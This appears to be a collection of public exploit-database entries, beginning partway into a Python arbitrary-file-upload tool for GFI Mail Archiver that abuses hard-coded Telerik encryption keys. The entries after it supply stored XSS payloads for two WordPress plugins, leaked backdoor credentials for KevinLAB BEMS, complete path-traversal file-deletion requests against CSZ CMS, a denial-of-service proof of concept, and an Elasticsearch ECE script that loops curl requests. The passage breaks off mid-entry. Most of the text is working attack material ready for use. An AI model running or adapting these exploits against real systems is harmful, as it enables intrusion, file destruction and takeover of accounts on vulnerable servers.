        # Returns (key, iv) = (first 32 bytes, remainder) of the derived material.
        # The default salt is a fixed 13-character string.
        # NOTE(review): `type` shadows the builtin, and a value other than 1 or 2
        # leaves `result` unbound, so the final line raises UnboundLocalError.
        if type == 1:
            result = PBKDF.derive1(password, salt)
            result = result[0:32] + result[8:16] + result[40:48]  # Bizarre hack
        elif type == 2:
            result = PBKDF.derive2(password, salt)
        return result[0:32], result[32:]


class RAUCipher:
    """AES-CBC wrapper for the Telerik RadAsyncUpload configuration blob.

    key and iv are derived once, at class-definition time, from PASSWORD; the
    HMAC in addHmac uses HASHKEY. Both default to the hard-coded values below.
    """

    # ******************************************
    # ******************************************
    # ADVANCED_SETTINGS section 2 of 2
    # Default settings are for vulnerable versions before 2017 patches with default keys

    T_Upload_ConfigurationHashKey = \
        "PrivateKeyForHashOfUploadConfiguration"
    # Default hardcoded key for versions before 2017 patches
    HASHKEY = T_Upload_ConfigurationHashKey  # or your custom hashkey

    T_AsyncUpload_ConfigurationEncryptionKey = \
        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration"
    # Default hardcoded key for versions before 2017 patches
    PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey  # or your custom password

    # Latest tested version working with this setting: 2018.1.117
    # Probably working up to and including 2018.3.910
    PBKDF_ALGORITHM = 1
    # Earliest tested version working with this setting: 2019.2.514
    # Probably introduced 2019.1.115
    # PBKDF_ALGORITHM = 2
    # ******************************************
    # ******************************************

    # Runs at import time; a derivation error here fails the whole module.
    key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD)
    # print(binascii.hexlify(key).decode().upper())
    # print(binascii.hexlify(iv).decode().upper())

    def encrypt(plaintext):
        # Interleaves a NUL after every character (UTF-16LE-like for ASCII
        # input), pads PKCS#7-style to a 16-byte boundary, AES-CBC encrypts and
        # base64 encodes. Writes progress text to stderr as a side effect.
        sys.stderr.write("Encrypting... ")
        encoded = ""
        for i in plaintext:
            encoded = encoded + i + "\x00"
        plaintext = encoded + (
            chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16))
        )
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        sys.stderr.write("done\n")
        return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()

    def decrypt(ciphertext):
        # Inverse of encrypt: base64 decode, AES-CBC decrypt, strip padding by
        # the last byte's value, then drop the interleaved NULs via [0::2].
        # No padding or MAC validation - malformed input surfaces as a
        # decode/slice error rather than a clean failure.
        sys.stderr.write("Decrypting... ")
        ciphertext = base64.b64decode(ciphertext)
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        unpad = lambda s: s[0:-ord(chr(s[-1]))]
        sys.stderr.write("done\n")
        return unpad(cipher.decrypt(ciphertext)).decode()[0::2]

    def addHmac(string, Version):
        # Appends base64(HMAC-SHA256(HASHKEY, string)) when the Telerik version
        # year is 2017 or later; the HMAC is computed unconditionally.
        # Assumes Version starts with a four-digit year ("YYYY.x.y").
        isHmacVersion = False
        # "Encrypt-then-MAC" feature introduced in R1 2017
        # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.)
        if int(Version[:4]) >= 2017:
            isHmacVersion = True
        hmac = HMAC.new(
            bytes(RAUCipher.HASHKEY.encode()),
            string.encode(),
            SHA256.new()
        )
        hmac = base64.b64encode(hmac.digest()).decode()
        return string + hmac if isHmacVersion else string


def getProxy(proxy):
    """Return a requests-style proxies dict using `proxy` for both schemes (False when unset)."""
    return {
        "http" : proxy,
        "https" : proxy
    }


def rauPostData_enc(partA, partB):
    """Build the first multipart part: field `rauPostData` = encrypt(partA) + '&' + encrypt(partB)."""
    data = "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
    data += "\r\n"
    data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n"
    return data


def rauPostData_prep(TempTargetFolder, Version):
    """Serialize the AsyncUploadConfiguration for `Version` and return it as a rauPostData part.

    partA is the configuration JSON whose TargetFolder (empty) and
    TempTargetFolder (the caller-chosen destination path) are each
    encrypted and HMAC'd by addHmac; partB is the .NET type name carrying
    `Version`. Both are then encrypted again by rauPostData_enc.
    """
    TargetFolder = RAUCipher.addHmac(
        RAUCipher.encrypt(""),
        Version
    )
    TempTargetFolder = RAUCipher.addHmac(
        RAUCipher.encrypt(TempTargetFolder),
        Version
    )
    partA = \
        '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
        TempTargetFolder + \
        '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}'
    partB = \
        "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \
        Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4"
    return rauPostData_enc(partA, partB)


def payload(TempTargetFolder, Version, payload_filename):
    """Assemble the complete multipart body: rauPostData, the file, and the fixed metadata fields.

    The file is read in binary and decoded with raw_unicode_escape so it can
    be concatenated into a str body. NOTE(review): that codec interprets any
    literal `\\uXXXX` / `\\UXXXXXXXX` byte sequence in the file, so a binary
    payload containing one is altered in transit - confirm with a round-trip
    before relying on it. The file handle is closed explicitly rather than
    via `with`. Progress is written to stderr.
    """
    sys.stderr.write("Local file path: " + payload_filename + "\n")
    payload_filebasename = os.path.basename(payload_filename)
    sys.stderr.write("Destination file name: " + payload_filebasename + "\n")
    sys.stderr.write("Destination path: " + TempTargetFolder + "\n")
    sys.stderr.write("Version: " + Version + "\n")
    sys.stderr.write("Preparing payload... \n")
    payload_file = open(payload_filename, "rb")
    payload_file_data = payload_file.read()
    payload_file.close()
    data = rauPostData_prep(TempTargetFolder, Version)
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n"
    data += "Content-Type: application/octet-stream\r\n"
    data += "\r\n"
    data += payload_file_data.decode("raw_unicode_escape") + "\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"fileName\"\r\n"
    data += "\r\n"
    # Fixed marker value - a reliable detection string in upload logs.
    data += "RAU_crypto.bypass\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"contentType\"\r\n"
    data += "\r\n"
    data += "text/html\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n"
    data += "\r\n"
    data += "2019-01-02T03:04:05.067Z\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"metadata\"\r\n"
    data += "\r\n"
    # UploadID carries the local file's basename; TotalFileSize is always 1.
    data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \
        payload_filebasename + "\"}\r\n"
    data += "-----------------------------62616f37756f2f--\r\n"
    data += "\r\n"
    sys.stderr.write("Payload prep done\n")
    return data


def upload(data, url, proxy = False):
    """POST `data` to `url` with the fixed boundary and return the response body as text.

    Certificate verification follows the module constant CERT_VERIFY (False);
    the `global` declaration is read-only and therefore redundant. No status
    code check is done - the caller only sees the body.
    """
    global CERT_VERIFY
    sys.stderr.write("Preparing to send request to " + url + "\n")
    session = requests.Session()
    request = requests.Request(
        "POST",
        url,
        data=data
    )
    request = request.prepare()
    request.headers["Content-Type"] = \
        "multipart/form-data; " +\
        "boundary=---------------------------62616f37756f2f"
    response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy))
    sys.stderr.write("Request done\n")
    return response.text


def decode_rauPostData(rauPostData):
    """Decrypt a captured rauPostData value ("<cfg>&<type>") into a readable summary.

    Useful for triage of captured traffic: prints the configuration JSON,
    the decrypted TempTargetFolder, and the version string. Raises on input
    without exactly the expected '&'-separated layout.
    """
    rauPostData = rauPostData.split("&")
    rauJSON = RAUCipher.decrypt(rauPostData[0])
    decoded = "\nJSON: " + rauJSON + "\n"
    TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"]
    decoded = decoded + "\nTempTargetFolder = " + \
        RAUCipher.decrypt(TempTargetFolder) + "\n"
    rauVersion = RAUCipher.decrypt(rauPostData[1])
    decoded = decoded + "\nVersion: " + rauVersion + "\n"
    return decoded


# The mode_* helpers below are kept from the original tool; only mode_Post and
# mode_help are reachable from the dispatch at the bottom of this file.

def mode_decrypt():
    # decrypt ciphertext
    ciphertext = sys.argv[2]
    print("\n" + RAUCipher.decrypt(ciphertext) + "\n")


def mode_Decrypt_rauPostData():
    # decrypt rauPostData
    rauPostData = sys.argv[2]
    print(decode_rauPostData(rauPostData))


def mode_encrypt():
    # encrypt plaintext
    plaintext = sys.argv[2]
    print("\n" + RAUCipher.encrypt(plaintext) + "\n")


def mode_Encrypt_rauPostData():
    # encrypt rauPostData based on TempTargetFolder and Version
    TempTargetFolder = sys.argv[2]
    Version = sys.argv[3]
    print(
        "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n"
    )


def mode_payload():
    # generate a payload based on TempTargetFolder, Version and payload file
    # Version is hard-coded here; argv[3] is not read.
    TempTargetFolder = sys.argv[2]
    Version = "2013.1.417.40"
    payload_filename = sys.argv[4]
    print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f")
    print(payload(TempTargetFolder, Version, payload_filename))


def mode_Post(proxy = False):
    # generate and upload a payload based on
    # TempTargetFolder, Version, payload file and url
    # Positional assumptions: argv == [script, '-u', URL, '-f', FILE, '-p', PATH];
    # only argv[1] == '-u' and the argument count are checked by the dispatcher.
    # Version is hard-coded, so addHmac's >= 2017 branch is never taken here.
    Version = "2013.1.417.40"
    url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau"
    payload_filename = sys.argv[4]
    TempTargetFolder = sys.argv[6]
    print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy))
    print("\n[+] Check your uploaded file\n");


def mode_help():
    print(
        "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'")


# Module-level side effects: banner on stderr, then argv dispatch (no __main__ guard).
sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n")
sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n")

if len(sys.argv) < 2:
    mode_help()
elif sys.argv[1] == "-u" and len(sys.argv) == 7:
    mode_Post()
else:
    mode_help()
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS) # Date: 18/07/2021 # Exploit Author: Vikas Srivastava # Vendor Homepage: # Software Link: https://wordpress.org/plugins/mimetic-books/ # Version: 0.2.13 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Mimetic Books 3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field. 4. Click Save Changes. 5. The payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears. 6. Payload Used: "><script>alert(document.cookie)</script>

KevinLAB BEMS 1.0 - Undocumented Backdoor Account

# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5654 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php 05.07.2021 -- Backdoor accounts from the DB: ------------------------------ Username: kevinlab (permission=1) Password: kevin003 Username: developer1 (permission=6) Password: 1234

CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion

# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion # Date: 2021-07-20 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.cszcms.com # Software Link: https://sourceforge.net/projects/cszcms/files/latest/download # Version: 1.2.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/cskaza/cszcms/issues/32 ################ # Description # ################ # CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php Steps to Reproduce: 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. 
Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" 1) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root Request: ======== POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 Host: localhost Content-Length: 2048 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 Connection: close ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="title" article beta ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="keyword" testing file ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="short_desc" deletion ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="cat_id" 2 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="content" <div class="row"> <div class="col-md-12"> <p>test for file deletion</p> </div> </div> <p><br><br></p> ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: 
form-data; name="del_file" ../../../conf_secret_file.php ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainPicture" 2021/1626802955_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file2" ../../../config_backup.txt ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload2"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainFile" 2021/1626802956_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="lang_iso" en ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_limit" 5 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_sort" reverse_time ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundaryAMyATk1BfQaBOHvY-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php Steps to Reproduce: 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. 
Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" 2) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root Request: ======== POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1 Host: localhost Content-Length: 5163 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu Connection: close ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTitle" CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="title_setting" 2 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteFooter" &copy; %Y% CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteKeyword" CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTheme" cszdefault ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 
Content-Disposition: form-data; name="siteLang" english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_metatag" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_js" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="pagecache_time" 0 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="assets_static_domain" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="html_optimize_disable" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_file" ../../conf_secret_file.php ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLogo" 2021/1626800829_logo.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_og_image" ../../config_backup.txt ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="og_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ogImage" 2021/1626800829_og.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteEmail" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_protocal" mail ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_host" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_user" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_pass" 123456 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_port" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="sendmail_path" 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_logs" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_sitekey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_secretkey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_client_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_view_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gsearch_cxid" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_key" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lat" -28.621975 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lng" 150.689082 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="fbapp_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="facebook_page_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="adobe_cc_apikey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_bg" #645862 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_fg" #ffffff ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_link" #f1d600 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_msg" This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_linkmsg" Privacy Policy and terms. 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_moreinfo" https://www.cszcms.com/LICENSE.md ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_txtalign" left ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_close" Got it! ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundary8cAl5KcKGP0D3Qi2-- --- # For more explanation, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32 # The affected version is 1.2.9.
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) # Date: 23/07/2021 # Exploit Author: Vikas Srivastava # Software Link: https://wordpress.org/plugins/simple-post/ # Version: 1.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Simple Post 3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field. 4. Click Update Options. 5. You will observe that the payload is stored in the database, and whenever the same functionality is triggered the JavaScript payload executes and a pop-up appears. 6. Payload Used: "><script>alert(document.cookie)</script>

NoteBurner 2.35 - Denial Of Service (DoS) (PoC)

# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
#
# Reviewer notes: this is Python 2 (print statements). The script only writes
# a 6000-byte string of 'A' (0x41) to Evil.txt in the current directory; the
# crash itself happens when that text is pasted into the application's licence
# dialog, not when this script runs. The filename written here is "Evil.txt"
# while the steps above say "EVIL.txt" (the same file on a case-insensitive
# filesystem). The bare ``except:`` hides the real error (for example a
# permission problem) behind a generic message, and ``buffer`` shadows a
# Python 2 builtin.
# Defensive take-away: the licence fields accept input of unbounded length;
# the fix is to bound and validate field length before processing it.

# 6000 bytes of 0x41 ('A').
buffer = "\x41" * 6000
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Elasticsearch ECE 7.13.3 - Anonymous Database Dump

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) # Date: 2021-07-25 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://xos-shop.com # Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 # Version: 1.0.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 ################ # Description # ################ # XOS-Shop is a further development of the well-known open source webshop system "osCommerce". XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in the admin panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain web server security mechanisms, for example by deleting the .htaccess file, which would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php Steps to Reproduce: 1. Log in as admin 2. Go to Catalog > Manufacturers > edit any 